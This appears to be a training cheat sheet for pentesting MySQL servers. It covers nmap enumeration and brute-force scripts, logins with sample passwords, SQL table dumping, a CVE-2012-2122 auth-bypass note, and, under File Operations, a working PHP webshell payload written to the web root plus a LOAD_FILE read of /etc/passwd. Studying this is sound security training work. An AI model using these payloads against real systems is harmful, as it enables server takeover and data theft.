# Pentesting MySQL

## Overview

* Default port: TCP 3306
* Config file: `/etc/mysql/mysql.conf.d/mysqld.cnf`

## Installation

```
sudo apt install mysql-server -y
```

## View Config

```
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'
```

## Dangerous Settings

| Setting            | Description                                |
| ------------------ | ------------------------------------------ |
| user               | MySQL service user (plain text in config)  |
| password           | MySQL user password (plain text in config) |
| admin\_address     | Admin listen IP                            |
| debug              | Debugging output settings                  |
| sql\_warnings      | Warnings on single-row INSERT              |
| secure\_file\_priv | Import/export path restrictions            |

## Scanning

```
sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*
```

NSE scripts: mysql-brute, mysql-databases, mysql-dump-hashes, mysql-empty-password, mysql-enum, mysql-info, mysql-users, mysql-variables, mysql-vuln-cve2012-2122

## Connecting

```
mysql -u root -h 10.129.14.132
mysql -u root -pP4SSw0rd -h 10.129.14.128
```

Note: no space between -p and the password.

## MySQL Commands

| Command                                                | Description     |
| ------------------------------------------------------ | --------------- |
| show databases;                                        | List databases  |
| use \<database>;                                       | Select database |
| show tables;                                           | List tables     |
| show columns from \<table>;                            | List columns    |
| select \* from \<table>;                               | Dump table      |
| select \* from \<table> where \<column> = "\<string>"; | Filter rows     |
| select version();                                      | Server version  |

## Important System Databases

* `system schema` (sys) — tables, info, metadata for management
* `information_schema` — database metadata

***

## File Operations

### Write Webshell (requires FILE privilege)

```sql
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
```

Check `secure_file_priv` — if empty, file operations are unrestricted; if set to a directory, writes are limited to that path; if NULL, file operations are disabled:

```sql
show variables like "secure_file_priv";
```

### Read Local Files

```sql
select LOAD_FILE("/etc/passwd");
```

***

## Windows MySQL Client

```
C:\htb> mysql.exe -u username -pPassword123 -h 10.129.20.13
```

***

## Known Vulnerabilities

| CVE           | Description                                                                                                                 |
| ------------- | --------------------------------------------------------------------------------------------------------------------------- |
| CVE-2012-2122 | MySQL 5.6.x authentication bypass via timing attack — approximately 1 in 256 connection attempts succeeds with any password |